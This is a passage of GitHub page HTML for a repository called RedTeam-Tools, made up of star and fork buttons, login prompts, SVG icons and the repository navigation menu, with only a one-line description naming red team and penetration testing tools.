data-hydro-click-hmac="20146f808f9430543e655f83a0f6459d7af7d25fffced8f9a476f5e497de67d5" data-view-component="true" class="btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path> </svg>Fork <span id="repo-network-counter" data-pjax-replace="true" data-turbo-replace="true" title="875" data-view-component="true" class="Counter">875</span> </a> </li> <li> <div data-view-component="true" class="BtnGroup d-flex"> <a href="/login?return_to=%2FA-poc%2FRedTeam-Tools" rel="nofollow" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"star button","repository_id":538444958,"auth_type":"LOG_IN","originating_url":"https://github.com/A-poc/RedTeam-Tools","user_id":null}}" data-hydro-click-hmac="210762992e2f8c8c411dd13546e6ed01604a603d197104df172b76cb4a12bb7d" aria-label="You must be signed in to star a repository" data-view-component="true" class="tooltipped tooltipped-sw btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path> </svg><span data-view-component="true" class="d-inline"> Star </span> <span id="repo-stars-counter-star" aria-label="6444 users starred this repository" data-singular-suffix="user starred this repository" data-plural-suffix="users starred this repository" data-turbo-replace="true" title="6,444" data-view-component="true" class="Counter js-social-count">6.4k</span> </a></div> </li> </ul> </div> </div> <div id="responsive-meta-container" data-turbo-replace> <div class="d-block d-md-none mb-2 px-3 px-md-4 px-lg-5"> <p class="f4 mb-3 "> Tools and Techniques for Red Team / Penetration Testing </p> <div class="mb-3"> <a class="Link--secondary no-underline mr-3" href="/A-poc/RedTeam-Tools/stargazers"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star mr-1"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path> </svg> <span class="text-bold">6.4k</span> stars </a> <a class="Link--secondary no-underline mr-3" href="/A-poc/RedTeam-Tools/forks"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-1"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path> </svg> <span class="text-bold">875</span> forks </a> <a class="Link--secondary no-underline mr-3 d-inline-block" href="/A-poc/RedTeam-Tools/branches"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch mr-1"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path> </svg> <span>Branches</span> </a> <a class="Link--secondary no-underline d-inline-block" href="/A-poc/RedTeam-Tools/tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-tag mr-1"> <path d="M1 7.775V2.75C1 1.784 1.784 1 2.75 1h5.025c.464 0 .91.184 1.238.513l6.25 6.25a1.75 1.75 0 0 1 0 2.474l-5.026 5.026a1.75 1.75 0 0 1-2.474 0l-6.25-6.25A1.752 1.752 0 0 1 1 7.775Zm1.5 0c0 .066.026.13.073.177l6.25 6.25a.25.25 0 0 0 .354 0l5.025-5.025a.25.25 0 0 0 0-.354l-6.25-6.25a.25.25 0 0 0-.177-.073H2.75a.25.25 0 0 0-.25.25ZM6 5a1 1 0 1 1 0 2 1 1 0 0 1 0-2Z"></path> </svg> <span>Tags</span> </a> <a class="Link--secondary no-underline d-inline-block" href="/A-poc/RedTeam-Tools/activity"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pulse mr-1"> <path d="M6 2c.306 0 .582.187.696.471L10 10.731l1.304-3.26A.751.751 0 0 1 12 7h3.25a.75.75 0 0 1 0 1.5h-2.742l-1.812 4.528a.751.751 0 0 1-1.392 0L6 4.77 4.696 8.03A.75.75 0 0 1 4 8.5H.75a.75.75 0 0 1 0-1.5h2.742l1.812-4.529A.751.751 0 0 1 6 2Z"></path> </svg> <span>Activity</span> </a> </div> <div class="d-flex flex-wrap gap-2"> <div class="flex-1"> <div data-view-component="true" class="BtnGroup d-flex"> <a href="/login?return_to=%2FA-poc%2FRedTeam-Tools" rel="nofollow" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"star button","repository_id":538444958,"auth_type":"LOG_IN","originating_url":"https://github.com/A-poc/RedTeam-Tools","user_id":null}}" data-hydro-click-hmac="210762992e2f8c8c411dd13546e6ed01604a603d197104df172b76cb4a12bb7d" aria-label="You must be signed in to star a repository" data-view-component="true" class="tooltipped tooltipped-sw btn-sm btn btn-block"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path> </svg><span data-view-component="true" class="d-inline"> Star </span> </a></div> </div> <div class="flex-1"> <a href="/login?return_to=%2FA-poc%2FRedTeam-Tools" rel="nofollow" id="files-overview-watch-button" data-hydro-click="{"event_type":"authentication.click","payload":{"location_in_page":"notification subscription menu watch","repository_id":null,"auth_type":"LOG_IN","originating_url":"https://github.com/A-poc/RedTeam-Tools","user_id":null}}" data-hydro-click-hmac="3730b16bad2c56778051dcd01bc9309f8763e8aa422cdf684b4fa8368a516313" aria-label="You must be signed in to change notification settings" data-view-component="true" class="btn-sm btn btn-block"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path> </svg>Notifications </a> <tool-tip id="tooltip-1a8a3e2e-71cb-4dc7-b2d6-283142522c46" for="files-overview-watch-button" popover="manual" data-direction="s" data-type="description" data-view-component="true" class="sr-only position-absolute">You must be signed in to change notification settings</tool-tip> </div> <span> </span> </div> </div> </div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <ul data-view-component="true" class="UnderlineNav-body list-style-none"> <li data-view-component="true" class="d-inline-flex"> <a id="code-tab" href="/A-poc/RedTeam-Tools" data-tab-item="i0code-tab" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments repo_attestations /A-poc/RedTeam-Tools" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g c" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Code","target":"UNDERLINE_NAV.TAB"}" aria-current="page" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item selected"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path> </svg> <span data-content="Code">Code</span> <span id="code-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="issues-tab" href="/A-poc/RedTeam-Tools/issues" data-tab-item="i1issues-tab" data-selected-links="repo_issues repo_labels repo_milestones /A-poc/RedTeam-Tools/issues" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g i" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Issues","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path> </svg> <span data-content="Issues">Issues</span> <span id="issues-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="pull-requests-tab" href="/A-poc/RedTeam-Tools/pulls" data-tab-item="i2pull-requests-tab" data-selected-links="repo_pulls checks /A-poc/RedTeam-Tools/pulls" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g p" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Pull requests","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path> </svg> <span data-content="Pull requests">Pull requests</span> <span id="pull-requests-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="actions-tab" href="/A-poc/RedTeam-Tools/actions" data-tab-item="i3actions-tab" data-selected-links="repo_actions /A-poc/RedTeam-Tools/actions" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g a" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Actions","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> <span data-content="Actions">Actions</span> <span id="actions-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="projects-tab" href="/A-poc/RedTeam-Tools/projects" data-tab-item="i4projects-tab" data-selected-links="repo_projects new_repo_project repo_project /A-poc/RedTeam-Tools/projects" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g b" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Projects","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path> </svg> <span data-content="Projects">Projects</span> <span id="projects-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="security-tab" href="/A-poc/RedTeam-Tools/security" data-tab-item="i5security-tab" data-selected-links="security overview alerts policy token_scanning code_scanning /A-poc/RedTeam-Tools/security" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-hotkey="g s" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Security","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> <span data-content="Security">Security</span> <include-fragment src="/A-poc/RedTeam-Tools/security/overall-count" accept="text/fragment+html"></include-fragment> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="insights-tab" href="/A-poc/RedTeam-Tools/pulse" data-tab-item="i6insights-tab" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /A-poc/RedTeam-Tools/pulse" data-pjax="#repo-content-pjax-container" data-turbo-frame="repo-content-turbo-frame" data-analytics-event="{"category":"Underline navbar","action":"Click tab","label":"Insights","target":"UNDERLINE_NAV.TAB"}" data-view-component="true" class="UnderlineNav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> <span data-content="Insights">Insights</span> <span id="insights-repo-tab-count" data-pjax-replace="" data-turbo-replace="" title="Not available" data-view-component="true" class="Counter"></span> </a></li> </ul> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <action-menu data-select-variant="none" data-view-component="true"> <focus-group direction="vertical" mnemonics retain> <button id="action-menu-ffea3cfa-3187-4dd4-84f3-8701c9df834e-button" popovertarget="action-menu-ffea3cfa-3187-4dd4-84f3-8701c9df834e-overlay" aria-controls="action-menu-ffea3cfa-3187-4dd4-84f3-8701c9df834e-list" aria-haspopup="true" aria-labelledby="tooltip-a66b7ac4-ee1c-41ef-bce7-217f49f38c29" type="button" data-view-component="true" class="Button Button--iconOnly Button--secondary Button--medium UnderlineNav-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal Button-visual"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path> </svg> </button><tool-tip id="tooltip-a66b7ac4-ee1c-41ef-bce7-217f49f38c29" for="action-menu-ffea3cfa-3187-4dd4-84f3-8701c9df834e-button" popover="manual" data-direction="s" data-type="label" data-view-component="true" class="sr-only position-absolute">Additional navigation options</tool-tip> <anchored-position data-target="action-menu.overlay" id="action-menu-ffea3cfa-3187-4dd4-84f3-8701c9df834e-overlay" anchor="action-menu-ffea3cfa-3187-4dd4-84f3-8701c9df834e-button" align="start" side="outside-bottom" anchor-offset="normal" popover="auto" data-view-component="true"> <div data-view-component="true" class="Overlay Overlay--size-auto"> <div data-view-component="true" class="Overlay-body Overlay-body--paddingNone"> <action-list> <div data-view-component="true"> <ul aria-labelledby="action-menu-ffea3cfa-3187-4dd4-84f3-8701c9df834e-button" id="action-menu-ffea3cfa-3187-4dd4-84f3-8701c9df834e-list" role="menu" data-view-component="true" class="ActionListWrap--inset ActionListWrap"> <li hidden="hidden" data-menu-item="i0code-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-4b7f60d7-dd59-44ef-b934-5356c430e281" href="/A-poc/RedTeam-Tools" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Code </span> </a> </li> <li hidden="hidden" data-menu-item="i1issues-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-24ff84b5-1ff0-4850-b9f4-45cc85120d5e" href="/A-poc/RedTeam-Tools/issues" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Issues </span> </a> </li> <li hidden="hidden" data-menu-item="i2pull-requests-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-21dc99a7-d33b-471b-b05a-d3aeea7340ef" href="/A-poc/RedTeam-Tools/pulls" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Pull requests </span> </a> </li> <li hidden="hidden" data-menu-item="i3actions-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-77a2a7e1-8bdf-4152-893a-a019ff26cd4e" href="/A-poc/RedTeam-Tools/actions" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Actions </span> </a> </li> <li hidden="hidden" data-menu-item="i4projects-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-dd793e0d-0480-4c41-9b26-e75b0e1ae5e9" href="/A-poc/RedTeam-Tools/projects" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Projects </span> </a> </li> <li hidden="hidden" data-menu-item="i5security-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-7a1ed752-fcd3-470e-b559-4bf81da5e9af" href="/A-poc/RedTeam-Tools/security" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Security </span> </a> </li> <li hidden="hidden" data-menu-item="i6insights-tab" data-targets="action-list.items" role="none" data-view-component="true" class="ActionListItem"> <a tabindex="-1" id="item-0456c50c-35b0-4b56-ab3d-47fa801a2a59" href="/A-poc/RedTeam-Tools/pulse" role="menuitem" data-view-component="true" class="ActionListContent ActionListContent--visual16"> <span class="ActionListItem-visual ActionListItem-visual--leading"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 